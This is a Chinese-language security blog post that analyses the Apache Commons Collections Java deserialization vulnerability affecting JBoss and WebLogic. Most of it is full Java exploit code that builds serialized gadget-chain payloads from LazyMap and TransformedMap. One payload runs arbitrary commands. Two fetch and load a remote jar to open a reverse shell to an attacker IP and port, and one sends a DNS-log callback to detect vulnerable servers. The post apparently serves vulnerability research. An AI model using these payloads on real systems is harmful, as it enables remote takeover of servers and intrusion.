- 1. 漏洞原理分析
- 1.1. LazyMap构造POC
- 1.2. TransformedMap构造POC
- 2. 漏洞高级利用
- 2.1. 反弹shell
- 2.1.1. LazyMap的实现方式
- 2.1.2. TransformedMap的实现方式
- 2.1.3. 漏洞检测?
- 2.1. 反弹shell
- 3. 参考资料
本文主要讨论Apache CommonsCollections组件的Deserialize功能存在的问题,该问题其实在2015年1月份在国外已经被发现,直到在今年11月初才被国内相关网站发现并且在安全圈子里面迅速升温,不少安全公司已经采用批量化的程序对互联网上受影响的网站进行检测,由于CommonsCollections为Apache开源项目的重要组件,所以该组建的使用量非常大,这次主要是JBOSS,weblogic等中间件受影响,通过对漏洞的POC进行修改,可以直接控制受影响的服务器。
1 2 3 4 5 6 |
public InvokerTransformer(String methodName, Class[] paramTypes, Object[] args) { super(); iMethodName = methodName; iParamTypes = paramTypes; iArgs = args; } |
- LazyMap
- TransformedMap
1 2 3 4 5 6 7 8 9 |
public Object get(Object key) { // create value for key if key is not currently in the map if (map.containsKey(key) == false) { Object value = factory.transform(key); map.put(key, value); return value; } return map.get(key); } |
1 2 3 |
public static Map decorate(Map map, Transformer factory) { return new LazyMap(map, factory); } |
这里的memberValues是我们通过构造AnnotationInvocationHandler 构造函数初始化的变量,也就是我们构造的lazymap对象,这里我们只需要找到一个memberValues.get(Object)的方法即可触发该漏洞,但是可惜的是该方法里面并没有这个方法。
这里大家应该能明白老外为什么要用动态代理来进行构造POC了,因为AnnotationInvocationHandler默认实现了InvocationHandler接口,在用Object iswin=Proxy.newInstance(classloader,interface,InvocationHandler)生成动态代理后,当对象iswin在进行对象调用时,那么就会调用InvocationHandler.invoke(xx)方法,所以POC的执行流程为map.xx->proxy(Map).invoke->lazymap.get(xx) 就会触发transform方法从而执行恶意代码。
1 2 3 |
protected Object checkSetValue(Object value) { return valueTransformer.transform(value); } |
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 |
import java.io.File; import java.io.FileInputStream; import java.io.FileNotFoundException; import java.io.FileOutputStream; import java.io.IOException; import java.io.ObjectInputStream; import java.io.ObjectOutputStream; import java.lang.annotation.Retention; import java.lang.reflect.Constructor; import java.util.HashMap; import java.util.Map; import java.util.Map.Entry; import org.apache.commons.collections.Transformer; import org.apache.commons.collections.functors.ChainedTransformer; import org.apache.commons.collections.functors.ConstantTransformer; import org.apache.commons.collections.functors.InvokerTransformer; import org.apache.commons.collections.map.TransformedMap; /** * @ClassName: Main.java * @Description: TODO * @author iswin * @email [email protected] * @Date 2015年11月8日 下午12:12:13 */ public class Main { public static Object Reverse_Payload(String execArgs) throws Exception { final Transformer[] transforms = new Transformer[] { new ConstantTransformer(Runtime.class), new InvokerTransformer("getMethod", new Class[] { String.class, Class[].class }, new Object[] { "getRuntime", new Class[0] }), new InvokerTransformer("invoke", new Class[] { Object.class, Object[].class }, new Object[] { null, new Object[0] }), new InvokerTransformer("exec", new Class[] { String.class }, execArgs), new ConstantTransformer(1) }; Transformer transformerChain = new ChainedTransformer(transforms); Map innermap = new HashMap(); innermap.put("value", "value"); Map outmap = TransformedMap.decorate(innermap, null, transformerChain); Class cls = Class .forName("sun.reflect.annotation.AnnotationInvocationHandler"); Constructor ctor = cls.getDeclaredConstructor(Class.class, Map.class); ctor.setAccessible(true); Object instance = ctor.newInstance(Retention.class, outmap); return instance; } public static void main(String[] args) throws Exception { GeneratePayload(Reverse_Payload("cmd"), "/Users/iswin/Downloads/test.bin"); } public static void GeneratePayload(Object instance, String file) throws Exception { File f = new File(file); ObjectOutputStream out = new ObjectOutputStream(new FileOutputStream(f)); out.writeObject(instance); out.flush(); out.close(); } public static void payloadTest(String file) throws Exception { // 这里为测试上面的tansform是否会触发payload // Map.Entry onlyElement =(Entry) outmap.entrySet().iterator().next(); // onlyElement.setValue("foobar"); ObjectInputStream in = new ObjectInputStream(new FileInputStream(file)); in.readObject(); in.close(); } } |
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 |
package ysoserial.payloads; import java.io.File; import java.io.FileOutputStream; import java.io.ObjectOutputStream; import java.lang.annotation.Retention; import java.lang.reflect.Constructor; import java.lang.reflect.Field; import java.lang.reflect.InvocationHandler; import java.lang.reflect.Proxy; import java.util.HashMap; import java.util.Map; import org.apache.commons.collections.Transformer; import org.apache.commons.collections.functors.ChainedTransformer; import org.apache.commons.collections.functors.ConstantTransformer; import org.apache.commons.collections.functors.InvokerTransformer; import org.apache.commons.collections.map.LazyMap; public class CommonsCollections1{ public InvocationHandler getObject(final String ip) throws Exception { // inert chain for setup final Transformer transformerChain = new ChainedTransformer( new Transformer[] { new ConstantTransformer(1) }); // real chain for after setup final Transformer[] transformers = new Transformer[] { new ConstantTransformer(java.net.URLClassLoader.class), // getConstructor class.class classname new InvokerTransformer("getConstructor", new Class[] { Class[].class }, new Object[] { new Class[] { java.net.URL[].class } }), // newinstance string http://www.iswin.org/attach/iswin.jar new InvokerTransformer( "newInstance", new Class[] { Object[].class }, new Object[] { new Object[] { new java.net.URL[] { new java.net.URL( "http://www.iswin.org/attach/iswin.jar") } } }), // loadClass String.class R new InvokerTransformer("loadClass", new Class[] { String.class }, new Object[] { "R" }), // set the target reverse ip and port new InvokerTransformer("getConstructor", new Class[] { Class[].class }, new Object[] { new Class[] { String.class } }), // invoke new InvokerTransformer("newInstance", new Class[] { Object[].class }, new Object[] { new String[] { ip } }), new ConstantTransformer(1) }; final Map innerMap = new HashMap(); final Map lazyMap = LazyMap.decorate(innerMap, transformerChain); //this will generate a AnnotationInvocationHandler(Override.class,lazymap) invocationhandler InvocationHandler invo = (InvocationHandler) getFirstCtor( "sun.reflect.annotation.AnnotationInvocationHandler") .newInstance(Retention.class, lazyMap); //generate object which implements specifiy interface final Map mapProxy = Map.class.cast(Proxy.newProxyInstance(this .getClass().getClassLoader(), new Class[] { Map.class }, invo)); final InvocationHandler handler = (InvocationHandler) getFirstCtor( "sun.reflect.annotation.AnnotationInvocationHandler") .newInstance(Retention.class, mapProxy); setFieldValue(transformerChain, "iTransformers", transformers); return handler; } public static Constructor> getFirstCtor(final String name) throws Exception { final Constructor> ctor = Class.forName(name) .getDeclaredConstructors()[0]; ctor.setAccessible(true); return ctor; } public static Field getField(final Class> clazz, final String fieldName) throws Exception { Field field = clazz.getDeclaredField(fieldName); if (field == null && clazz.getSuperclass() != null) { field = getField(clazz.getSuperclass(), fieldName); } field.setAccessible(true); return field; } public static void setFieldValue(final Object obj, final String fieldName, final Object value) throws Exception { final Field field = getField(obj.getClass(), fieldName); field.set(obj, value); } public static void main(final String[] args) throws Exception { final Object objBefore = CommonsCollections1.class.newInstance() .getObject(""); //deserialize(serialize(objBefore)); File f = new File("/Users/iswin/Downloads/payloadsfinal.bin"); ObjectOutputStream out = new ObjectOutputStream(new FileOutputStream(f)); out.writeObject(objBefore); out.flush(); out.close(); } } |
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 |
import java.io.File; import java.io.FileInputStream; import java.io.FileNotFoundException; import java.io.FileOutputStream; import java.io.IOException; import java.io.ObjectInputStream; import java.io.ObjectOutputStream; import java.lang.annotation.Retention; import java.lang.reflect.Constructor; import java.util.HashMap; import java.util.Map; import java.util.Map.Entry; import org.apache.commons.collections.Transformer; import org.apache.commons.collections.functors.ChainedTransformer; import org.apache.commons.collections.functors.ConstantTransformer; import org.apache.commons.collections.functors.InvokerTransformer; import org.apache.commons.collections.map.TransformedMap; /** * @ClassName: Main.java * @Description: TODO * @author iswin * @email [email protected] * @Date 2015年11月8日 下午12:12:13 */ public class Main { public static Object Reverse_Payload(String ip, int port) throws Exception { final Transformer[] transforms = new Transformer[] { new ConstantTransformer(java.net.URLClassLoader.class), // getConstructor class.class classname new InvokerTransformer("getConstructor", new Class[] { Class[].class }, new Object[] { new Class[] { java.net.URL[].class } }), // newinstance string http://www.iswin.org/attach/iswin.jar new InvokerTransformer( "newInstance", new Class[] { Object[].class }, new Object[] { new Object[] { new java.net.URL[] { new java.net.URL( "http://www.iswin.org/attach/iswin.jar") } } }), // loadClass String.class R new InvokerTransformer("loadClass", new Class[] { String.class }, new Object[] { "R" }), // set the target reverse ip and port new InvokerTransformer("getConstructor", new Class[] { Class[].class }, new Object[] { new Class[] { String.class } }), // invoke new InvokerTransformer("newInstance", new Class[] { Object[].class }, new Object[] { new String[] { ip + ":" + port } }), new ConstantTransformer(1) }; Transformer transformerChain = new ChainedTransformer(transforms); Map innermap = new HashMap(); innermap.put("value", "value"); Map outmap = TransformedMap.decorate(innermap, null, transformerChain); Class cls = Class .forName("sun.reflect.annotation.AnnotationInvocationHandler"); Constructor ctor = cls.getDeclaredConstructor(Class.class, Map.class); ctor.setAccessible(true); Object instance = ctor.newInstance(Retention.class, outmap); return instance; } public static void main(String[] args) throws Exception { GeneratePayload(Reverse_Payload("", 8090), "/Users/iswin/Downloads/test.bin"); } public static void GeneratePayload(Object instance, String file) throws Exception { File f = new File(file); ObjectOutputStream out = new ObjectOutputStream(new FileOutputStream(f)); out.writeObject(instance); out.flush(); out.close(); } public static void payloadTest(String file) throws Exception { // 这里为测试上面的tansform是否会触发payload // Map.Entry onlyElement =(Entry) outmap.entrySet().iterator().next(); // onlyElement.setValue("foobar"); ObjectInputStream in = new ObjectInputStream(new FileInputStream(file)); in.readObject(); in.close(); } } |
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 |
package iswin; import java.io.File; import java.io.FileOutputStream; import java.io.ObjectOutputStream; import java.lang.reflect.Constructor; import java.lang.reflect.Field; import java.lang.reflect.InvocationHandler; import java.lang.reflect.Proxy; import java.util.HashMap; import java.util.Map; import org.apache.commons.collections.Transformer; import org.apache.commons.collections.functors.ChainedTransformer; import org.apache.commons.collections.functors.ConstantTransformer; import org.apache.commons.collections.functors.InvokerTransformer; import org.apache.commons.collections.map.LazyMap; public class CommonsCollections1 { public InvocationHandler getObject(final String ip) throws Exception { final Transformer transformerChain = new ChainedTransformer( new Transformer[] { new ConstantTransformer(1) }); final Transformer[] transformers = new Transformer[] { new ConstantTransformer(java.net.URL.class), new InvokerTransformer("getConstructor", new Class[] { Class[].class }, new Object[] { new Class[] { String.class } }), new InvokerTransformer("newInstance", new Class[] { Object[].class }, new Object[] { new String[] { ip } }), new InvokerTransformer("openStream", new Class[] {}, new Object[] {}), new ConstantTransformer(1) }; // final Map innerMap = new HashMap(); // // final Map lazyMap = LazyMap.decorate(new HashMap(), // transformerChain); // this will generate a // AnnotationInvocationHandler(Override.class,lazymap) invocationhandler InvocationHandler invo = (InvocationHandler) getFirstCtor( "sun.reflect.annotation.AnnotationInvocationHandler") .newInstance(Override.class, LazyMap.decorate(new HashMap(), transformerChain)); final Map mapProxy = Map.class.cast(Proxy.newProxyInstance(this .getClass().getClassLoader(), new Class[] { Map.class }, invo)); final InvocationHandler handler = (InvocationHandler) getFirstCtor( "sun.reflect.annotation.AnnotationInvocationHandler") .newInstance(Override.class, mapProxy); setFieldValue(transformerChain, "iTransformers", transformers); return handler; } public static Constructor> getFirstCtor(final String name) throws Exception { final Constructor> ctor = Class.forName(name) .getDeclaredConstructors()[0]; ctor.setAccessible(true); return ctor; } public static Field getField(final Class> clazz, final String fieldName) throws Exception { Field field = clazz.getDeclaredField(fieldName); if (field == null && clazz.getSuperclass() != null) { field = getField(clazz.getSuperclass(), fieldName); } field.setAccessible(true); return field; } public static void setFieldValue(final Object obj, final String fieldName, final Object value) throws Exception { final Field field = getField(obj.getClass(), fieldName); field.set(obj, value); } public static void main(final String[] args) throws Exception { final Object objBefore = CommonsCollections1.class.newInstance() .getObject("http://abc.333d61.dnslog.info/tangscan/iswin.jpg"); File f = new File("/Users/iswin/Downloads/hello.bin"); ObjectOutputStream out = new ObjectOutputStream(new FileOutputStream(f)); out.writeObject(objBefore); out.flush(); out.close(); // Serializables.deserialize(Serializables.serialize(objBefore)); } } |
[1] :https://github.com/frohoff/ysoserial/
[2] :http://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/#jboss